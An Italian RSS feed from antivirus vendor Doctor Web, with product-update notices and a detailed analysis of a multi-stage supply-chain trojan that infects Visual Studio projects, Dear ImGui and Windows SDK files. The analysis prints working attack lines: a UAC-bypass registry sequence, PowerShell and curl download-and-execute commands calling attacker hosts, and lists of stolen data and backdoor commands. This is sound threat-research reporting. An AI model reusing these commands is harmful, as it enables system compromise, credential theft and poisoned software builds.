<?xml version="1.0"?>
<rss version="2.0"><channel><title>Tutte le notizie</title><link>https://news.drweb-av.it/news/</link><description>Notizie della società Doctor Web - Tutte le notizie</description><image><url>https://st.drweb.com/static/drweb_logo_it.gif</url><link>https://news.drweb-av.it/news/</link><title>Antivirus Dr.Web</title></image><item><guid>https://news.drweb-av.it/show/?i=15291&amp;lng=it</guid><title>Aggiornamento del server di gestione centralizzata per Dr.Web Enterprise Security Suite e Dr.Web Industrial</title><link>https://news.drweb-av.it/show/?i=15291&amp;lng=it&amp;c=5</link><pubDate>Thu, 23 Jul 2026 09:54:20 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;L'azienda Doctor Web sta per rilasciare un aggiornamento per il server incluso in Dr.Web Enterprise Security Suite e Dr.Web Industrial versione 13.0.1.202606110. La nuova versione sarà disponibile per il download a partire dal 27 luglio 2026 tramite l'interfaccia web della console di gestione.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Che cosa fornisce il nuovo aggiornamento&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;In primo luogo, la release è volta ad aumentare la stabilità di funzionamento del Pannello di controllo e correggere una serie di errori individuati nella versione precedente. In particolare, sono stati risolti i problemi della visualizzazione degli elementi figlio durante il filtraggio nell'albero della rete antivirus, sono stati corretti gli errori nell'invio degli avvisi ad amministratori e nella generazione dei report. L'elenco completo delle modifiche è disponibile in &lt;a href="https://news.drweb-av.it/changelog/?lng=it"&gt;Changelog&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Influenza sugli agent (tra l'altro, anche in Dr.Web Industrial)&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;L'aggiornamento del server non influisce sul funzionamento degli agent sui nodi protetti. Il processo di aggiornamento del componente server non richiede il riavvio o la riconfigurazione del software agent - essi continueranno a funzionare regolarmente. Per gli ambienti industriali, dove viene utilizzato Dr.Web Industrial, questo significa l'assenza di qualsiasi cambiamento nel funzionamento degli agent, poiché tutte le correzioni riguardano esclusivamente la parte server e l'interfaccia di gestione.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Importante:&lt;/strong&gt; Il Server Dr.Web verrà automaticamente riavviato durante l'installazione degli aggiornamenti. Vi consigliamo di programmare la procedura in anticipo per un momento di minore carico.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15284&amp;lng=it</guid><title>Aggiornamento del componente antispam in Dr.Web Enterprise Security Suite e in Dr.Web in abbonamento</title><link>https://news.drweb-av.it/show/?i=15284&amp;lng=it&amp;c=5</link><pubDate>Wed, 15 Jul 2026 17:04:40 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;L'azienda Doctor Web rilascia un aggiornamento del modulo antispam 1.1.2.202604160 incluso in Dr.Web Enterprise Security Suite e in Dr.Web in abbonamento. Sarà possibile scaricarlo a partire dal 20 luglio 2026.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Il modulo controlla in tempo reale il traffico email e analizza gli elementi dei messaggi di posta elettronica: intestazione, corpo, collegamenti ipertestuali e allegati. Il funzionamento del componente è bilanciato e non rallenta le prestazioni del client di posta.&lt;/p&gt;&lt;p&gt;Nella nuova versione sono stati migliorati il rilevamento dello spam e l'analisi dei link, nonché sono state apportate modifiche interne. Precedentemente è stato rilasciato un &lt;a href="https://news.drweb-av.it/show/?lng=it&amp;amp;i=14979"&gt;grande aggiornamento &lt;/a&gt;che ha migliorato l'efficacia del riconoscimento e del filtraggio del traffico indesiderato.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Richiamiamo l'attenzione degli utenti di Windows XP.&lt;/strong&gt; Se è attivata solo l'opzione di aggiornamento dei database dei virus, il plugin Dr.Web per Microsoft Outlook non funzionerà correttamente: tutte le email in arrivo verranno rilevate come spam. Come controllarlo: nelle impostazioni del programma selezionate la voce "Aggiornamento", quindi fate clic su "Impostazioni avanzate" e andate alla sezione "Componenti da aggiornare".&lt;/p&gt;&lt;p&gt;Consigliamo agli utenti di questo sistema operativo di aggiornarlo alle versioni successive, o di attivare nelle impostazioni l'aggiornamento di tutti i moduli del programma e non solo dei database dei virus.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15285&amp;lng=it</guid><title>Aggiornato il Contratto di licenza per i prodotti software Dr.Web</title><link>https://news.drweb-av.it/show/?i=15285&amp;lng=it&amp;c=5</link><pubDate>Wed, 15 Jul 2026 14:43:47 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;L'azienda Doctor Web ha aggiornato il Contratto di licenza per i prodotti software Dr.Web. Il documento è consultabile al link &lt;a href="https://license.drweb.com/agreement/."&gt;https://license.drweb.com/agreement/.&lt;/a&gt;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Elenco delle modifiche:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;il testo è strutturato in sezioni tematiche per facilitare la navigazione;&lt;/li&gt;&lt;li&gt;sono fornite le definizioni dei termini per una migliore comprensione del testo del documento e per prevenire interpretazioni errate;&lt;/li&gt;&lt;li&gt;è precisata la differenza tra l'uso autorizzato dei prodotti software Dr.Web e quello senza licenza;&lt;/li&gt;&lt;li&gt;sono fornite chiarimenti riguardanti le domande frequenti degli utenti: su quali dispositivi può essere utilizzata la licenza acquistata, se è obbligatorio che il dispositivo protetto sia di proprietà dell'utente, e altre domande simili.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Usando i prodotti software Dr.Web dopo l'entrata in vigore della nuova versione del Contratto di licenza, voi confermate di accettare integralmente le nuove condizioni. Se non accettate le modifiche, siete tenuti a rimuovere il software Dr.Web dai propri dispositivi.&lt;/p&gt;&lt;p&gt;Richiamiamo la vostra attenzione sul fatto che questo documento vale per tutti i prodotti software della famiglia Dr.Web ad eccezione di Dr.Web FixIt! e Dr.Web vxCube. Queste due soluzioni hanno i propri Contratti di licenza.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15276&amp;lng=it</guid><title>L'obiettivo sono gli sviluppatori. Un nuovo trojan attacca le catene di fornitura e causa danni combinati ai PC infetti</title><link>https://news.drweb-av.it/show/?i=15276&amp;lng=it&amp;c=5</link><pubDate>Fri, 10 Jul 2026 05:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Gli specialisti del laboratorio antivirus hanno analizzato un nuovo programma trojan. È una minaccia di tipo supply chain attack, cioè attacco alle catene di fornitura. Un tratto distintivo di questo malware è il suo focus sui progetti creati nel linguaggio di programmazione C++ e C#. Un'altra caratteristica è la sua elevata pericolosità. Il trojan unisce in sé diversi fattori distruttivi svolgendo contemporaneamente più funzioni: quelle di stealer, clipper, backdoor, cryptominer e fonte di infezione di file.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;I primi casi di diffusione del trojan sono stati registrati nell'ultimo trimestre del 2025, da allora in poi esso viene costantemente modificato dai relativi sviluppatori. Viene distribuito principalmente su internet tramite file infetti .exe e python. Il processo di infezione è a più fasi, di seguito analizziamo lo svolgimento di ciascuna fase e i rispettivi obiettivi.&lt;/p&gt;&lt;h3&gt;Fase 1. Trojan.DownLoader49.35384&lt;/h3&gt;&lt;p&gt;Gli specialisti Doctor Web hanno rilevato numerose applicazioni legittime infette con una struttura simile. Un oggetto globale è aggiunto al file eseguibile originale, e l'esecuzione dell'applicazione trojanizzata inizia con l'ottenimento dell'accesso alle API di sistema tramite il metodo PEB walking. Quindi la funzione standard initterm scorre la tabella dei puntatori a funzione e li inizializza, dove una di tali funzioni è malevola e lancia il comando PowerShell. In alcune versioni del trojan questo payload è conservato in forma crittografata.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Avvio tramite initterm&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Il comando PowerShell scarica ed esegue il file malevolo&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35687&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, il che significa che viene lanciata la seconda fase.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Comando PowerShell malevolo&lt;/i&gt;&lt;/p&gt;&lt;p&gt;In aggiunta ai file eseguibili, sono stati rilevati file in linguaggio Python (&lt;strong&gt;Python.Downloader.255&lt;/strong&gt;). In questi ultimi il codice malevolo era cifrato tramite il meccanismo di crittografia simmetrica Fernet. È celato tramite un semplice offuscamento — una sequenza di spazi nella prima riga. Anche in questo caso l'esecuzione avviene a più fasi.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;File Python malevoli&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Fase 2. Trojan.DownLoader49.35687&lt;/h3&gt;&lt;p&gt;In questa fase il trojan&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35687&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;esegue il controllo della propria esecuzione in sandbox. Oltre a ciò, crea un oggetto di sincronizzazione mutex con il nome Global\PFNMX(valore fisso). Esempio di un simile oggetto: &lt;span class="string"&gt;\Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008&lt;/span&gt;. In questo modo il trojan controlla se sul computer è già in esecuzione un'altra copia.&lt;/p&gt;&lt;p&gt;Durante la seconda fase, il trojan cerca di ottenere gli indirizzi del server C2 utilizzando i repository pubblici GitHub e della piattaforma di gioco Steam. Su di essi i malintenzionati lasciano domini che il trojan legge e utilizza come gli URL per scaricare la terza fase — il trojan &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Gli account Steam creati dai malintenzionati contengono un nome di dominio in chiaro.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Account Steam con un dominio C2&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Su GitHub i malintenzionati hanno salvato un indirizzo cifrato di un dominio C2 sotto forma di un file raw: &lt;span class="string"&gt;raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine&lt;/span&gt;. Il trojan scarica questo file e lo decodifica prima tramite Base64, e quindi tramite l'operazione XOR con la chiave ZwFlushKey.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Domini crittografati&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Dopo aver scaricato la fase successiva,&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35687&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;la incorpora nel processo di uno dei 41 file eseguibili previamente specificati da &lt;span class="string"&gt;C:\Windows\System32&lt;/span&gt;.&lt;/p&gt;&lt;p&gt;Il trojan aggiunge l'indirizzo del dominio C2 a cui ha potuto stabilire una connessione alle stringhe trascritte nel suo codice sorgente e lo passa alla fase successiva tramite il named pipe pipe\VccFramework.&lt;/p&gt;&lt;h3&gt;Fase 3. BackDoor.Siggen2.5906&lt;/h3&gt;&lt;p&gt;La principale attività malevola si verifica in questa fase. &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; crea un oggetto di sincronizzazione mutex con un nome fisso di tipo Global\PFNX_Side(valore fisso). Quindi, attraverso il canale precedentemente creato, il trojan ottiene i dati dalla seconda fase, dai quali estrae gli identificatori del trojan e il dominio C2 con cui &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; comunicherà.&lt;/p&gt;&lt;p&gt;Per guadagnare persistenza nel sistema, il trojan scarica il file "bungee.boo", che svolge le funzioni di fase 2, ovvero&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35687&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, e sostituisce con quest'ultimo i file DLL:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;"profapi.dll" dell'applicazione Discord,&lt;/li&gt;&lt;li&gt;"domain_actions.dll" nella cartella "Domain Actions" e "well_known_domains.dll" nella cartella "Well Known Domains" dell'applicazione Microsoft Edge,&lt;/li&gt;&lt;li&gt;"C:\Windows\omadmapi.dll".&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Inoltre, &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; può alterare il registro di sistema di Windows in modo tale che all'apertura dei file compressi tramite WinRar.exe venga eseguito il codice malevolo.&lt;/p&gt;&lt;p&gt;Per le azioni con i permessi amministratore, il trojan utilizza una tecnica di aggiramento dell'UAC. Il malware genera un file .vbs con un nome composto da cifre casuali, in cui lascia il comando per l'esecuzione con i permessi amministratore. Quindi tramite cmd.exe vengono avviati i comandi:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In seguito, il trojan svolge 5 funzioni malevole: quelle di stealer, clipper, backdoor, cryptominer e fonte di infezione di file.&lt;/p&gt;&lt;h3&gt;Stealer&lt;/h3&gt;&lt;p&gt;Il Trojan è in grado di rubare varie informazioni:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;i tocken Discord, che consentono di accedere agli account altrui senza inserire il login/la password;&lt;/li&gt;&lt;li&gt;le password e i cookie dai browser Chrome, Edge, Opera, Brave, Yandex ecc. Oltre alle solite tecniche di estrazione dei dati, esso può utilizzare il file CCCWF.tmp (&lt;strong&gt;Trojan.PWS.Siggen5.33623&lt;/strong&gt;). Si incorpora nel browser, e quindi legge le password e le salva in file di testo;&lt;/li&gt;&lt;li&gt;le cartelle di Telegram Desktop;&lt;/li&gt;&lt;li&gt;le cartelle del portafoglio crittografico Exodus.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Oltre a rubare le cartelle Exodus, il trojan esegue la modificazione del portafoglio crittografico. Per fare questo, esso trova il file app.asar e lo sostituisce con una copia scaricata dall'URL &lt;span class="string"&gt;balista[.]lol/Stb/PokerFace/RTApp[.]txt&lt;/span&gt; tramite curl. Nella versione furtivamente sostituita in index.js (&lt;strong&gt;Trojan.Siggen32.44702&lt;/strong&gt;) si trova la funzione unlock(), la quale all'esecuzione invia le frasi mnemoniche del portafoglio crypto al server dei malintenzionati.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;File index.js furtivamente sostituito&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Clipper&lt;/h3&gt;&lt;p&gt;È una funzione particolarmente pericolosa del trojan. Il malware monitora costantemente gli appunti dell'utente: cerca i dati di carte bancarie e li invia al server dei malintenzionati. Inoltre, il programma malevolo sostituisce gli indirizzi di portafogli crypto con quelli fraudolenti, i quali ottiene dal server C2.&lt;/p&gt;&lt;h3&gt;Backdoor&lt;/h3&gt;&lt;p&gt;Le funzionalità del trojan consentono ai malintenzionati di gestire il PC infetto in remoto mediante i comandi:&lt;/p&gt;&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;exc&lt;/td&gt;&lt;td&gt;scarica un file da un url tramite curl ed eseguilo&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RVRS&lt;/td&gt;&lt;td&gt;avvia un Reverse Proxy&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RUNCMD&lt;/td&gt;&lt;td&gt;avvia un comando tramite cmd&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;GETFILE&lt;/td&gt;&lt;td&gt;carica il contenuto di un determinato file sul server di comando e controllo&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;LISTDIR&lt;/td&gt;&lt;td&gt;invia la lista dei file da una determinata directory del computer al server di comando e controllo&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;TROLL&lt;/td&gt;&lt;td&gt;esegui il comando per il trolling dell'utente, esistono le opzioni earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer ecc.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;&lt;h3&gt;Cryptominer&lt;/h3&gt;&lt;p&gt;Tramite curl, il trojan scarica dal server e avvia il file &lt;span class="string"&gt;https://files[.]catbox[.]moe/lvh9j3[.]bin&lt;/span&gt;&amp;nbsp;— &lt;strong&gt;Trojan.Packed2.50953&lt;/strong&gt;. La sua struttura e le sue azioni sono simili a quelle della fase 2, ma, invece di &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;, esso scarica e incorpora &lt;strong&gt;Trojan.BtcMine.3956&lt;/strong&gt;. Questo cryptominer si avvia solo dopo un determinato periodo di inattività dell'utente. Il malware utilizza gli strumenti &lt;a href="https://github.com/xmrig/xmrig" target="_blank" rel="noopener"&gt;XMRig&lt;/a&gt;, &lt;a href="https://github.com/trexminer/T-Rex" target="_blank" rel="noopener"&gt;T-Rex&lt;/a&gt; e &lt;a href="https://github.com/todxx/teamredminer/releases" target="_blank" rel="noopener"&gt;TeamRedMiner &lt;/a&gt;a codice sorgente aperto.&lt;/p&gt;&lt;h3&gt;Infezione di file&lt;/h3&gt;&lt;p&gt;Il principale tratto distintivo di questo trojan sono l'infezione di file e l'ulteriore propagazione autonoma. La lista dei file che vengono infettati:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;imgui_impl_win32.cpp,&lt;/li&gt;&lt;li&gt;.suo,&lt;/li&gt;&lt;li&gt;.exe,&lt;/li&gt;&lt;li&gt;winnetwk.h (Windows SDK),&lt;/li&gt;&lt;li&gt;.vcxproj e .csproj.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Per determinare i percorsi dei file che possono essere infettati, il trojan scansiona sequenzialmente i dischi e avvia il comando. Esempio per il disco A://&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj &amp;gt; %ALLUSERSPROFILE%\ADat.bin3290.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I malintenzionati contano su quello che gli sviluppatori pubblicheranno i loro progetti con codice malevolo in accesso aperto. Altri sviluppatori, che assembleranno, compileranno o modificheranno il progetto, infetteranno automaticamente i propri computer a causa dei file .suo, .vcxproj e .csproj, mentre gli utenti comuni potranno avviare i file eseguibili infetti, creati tramite gli strumenti di sviluppo compromessi.&lt;/p&gt;&lt;h3&gt;File imgui_impl_win32.cpp. Trojan.Loader.3129&lt;/h3&gt;&lt;p&gt;Il file imgui_impl_win32.cpp è parte della popolare libreria Dear ImGui, responsabile dell'interfaccia grafica del linguaggio di programmazione C++. Il trojan incorpora nel file due stringhe: la prima contiene il payload, la seconda lo lancia.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Stringa di codice con il payload&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Stringa di codice con l'avvio del payload&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Il risultato è il comando&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
start /min cmd.exe /c powershell -WindowStyle Hidden -Command "&amp;amp; { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Pertanto, la libreria viene infettata, e qualsiasi applicazione in C++ creata dall'utente conterrà in sé codice malevolo. Con il trasferimento o caricamento delle simili applicazioni, l'infezione si diffonderà ulteriormente.&lt;/p&gt;&lt;h3&gt;File .suo. Trojan.Loader.3138&lt;/h3&gt;&lt;p&gt;È un'estensione dei file dell'ambiente di sviluppo Microsoft Visual Studio. In questi file sono conservate le impostazioni dell'utente per determinati progetti. Il trojan sostituisce il file originale con quello infetto, ottenuto dal C2.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;File infetto&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Come risultato, all'apertura del progetto in Visual Studio viene avviato il codice malevolo:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" &amp;amp;&amp;amp; start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3&gt;File winnetwk.h. Trojan.Loader.3184&lt;/h3&gt;&lt;p&gt;Windows SDK è un set di strumenti ufficiale di Microsoft che consente di creare applicazioni per SO Windows.&lt;/p&gt;&lt;p&gt;Tramite il registro, il trojan trova la cartella in cui è installato Windows SDK. In questa cartella avviene la ricerca del file &lt;span class="string"&gt;winnetwk.h&lt;/span&gt;, responsabile dell'interazione con le risorse di rete. Quindi ad esso viene aggiunto il codice malevolo.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;File winnetwk.h infetto&lt;/i&gt;&lt;/p&gt;&lt;p&gt;A seguito di questo, tutti i programmi creati con l'utilizzo di winnetwk.h avranno il codice malevolo, il quale avvia la fase 2.&lt;/p&gt;&lt;h3&gt;File .exe&lt;/h3&gt;&lt;p&gt;Il trojan cerca i file .exe adatti e incorpora in essi le funzioni di inizializzazione delle API e di avvio di initterm. Quindi il file inizia a funzionare come&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35384&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35384&lt;/b&gt;&lt;/a&gt;, ovvero la fase 1.&lt;/p&gt;&lt;h3&gt;File .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) e .csproj (Trojan.Loader.3126)&lt;/h3&gt;&lt;p&gt;Sono file dei progetti Visual Studio nei linguaggi di programmazione C++ e C#. Ad essi viene aggiunto il comando PreBuildEvent, che viene eseguito prima di ciascun assemblaggio di un progetto. Le prime versioni del trojan aggiungevano un codice simile alla fase 1.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Una prima versione di codice&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Nelle nuove versioni il codice è diventato più complesso, è comparso un ulteriore offuscamento.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Una nuova versione di codice&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Una delle fasi di esecuzione di &lt;strong&gt;Trojan.Loader.3128&lt;/strong&gt;&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Come risultato dell'esecuzione del comando malevolo, viene scritto un file .vbs malevolo, il quale, a sua volta, avvia PowerShell payload. Il trojan effettua una richiesta agli indirizzi URL:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;youtu.be/akoxddx6lgc,&lt;/li&gt;&lt;li&gt;steamcommunity.com/profiles/76561198737324192.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Su questi indirizzi è conservato un altro indirizzo URL crittografato tramite base64.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.1.png" 